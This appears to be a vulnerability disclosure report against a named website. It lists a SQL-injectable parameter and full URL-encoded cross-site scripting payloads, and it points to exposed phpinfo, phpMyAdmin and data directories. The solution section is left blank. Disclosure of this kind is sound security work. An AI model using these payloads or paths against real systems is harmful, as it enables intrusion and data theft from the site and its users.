SQL injection, cross-site scripting, and other issues
Description:
1. SQL Injection
Injection URL: http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1
Injection parameter: cateID
2. Cross-Site Scripting (XSS)
http://wh.alixiaoyuan.com/?app=buy&city_id=%22%20onmouseover%3dprompt%28970140%29%20bad%3d%22&group_id=17
http://wh.alixiaoyuan.com/?address=%E6%B1%9F%E5%AE%81%E5%8C%BA%E5%8F%8C%E9%BE%99%E5%A4%A7%E9%81%93&app=store_map&id=62&map=118.785401,32.000455&sname=store&store_name=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28997246%29%3c%2fScRiPt%3e
http://wh.alixiaoyuan.com/index.php?act=index&app=search&keyword=1&searchBtn=1&type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973765%29%3c%2fScRiPt%3e
http://wh.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28964089%29%3c%2fScRiPt%3e
3. Sensitive Information Leakage
http://www.alixiaoyuan.com/?app=buy&city_id=1'&group_id=17
http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1%27%22
http://www.alixiaoyuan.com/?app=buy&city_id=1%27%22&group_id=17
http://www.alixiaoyuan.com/external/modules/datacall/module.info.php
.....................................
4. phpinfo
http://www.alixiaoyuan.com/info.php
5. Source Code Leakage
http://www.alixiaoyuan.com/phpmyadmin/scripts/upgrade.pl
http://www.alixiaoyuan.com/themes/mall/default/styles/default/images/member/thumbs.db
http://www.alixiaoyuan.com/themes/store/default/groupbuy.index.html
6. Directory Leakage
http://www.alixiaoyuan.com/api/
http://www.alixiaoyuan.com/data/
http://www.alixiaoyuan.com/data/files
.....................
Solution:
=-= ~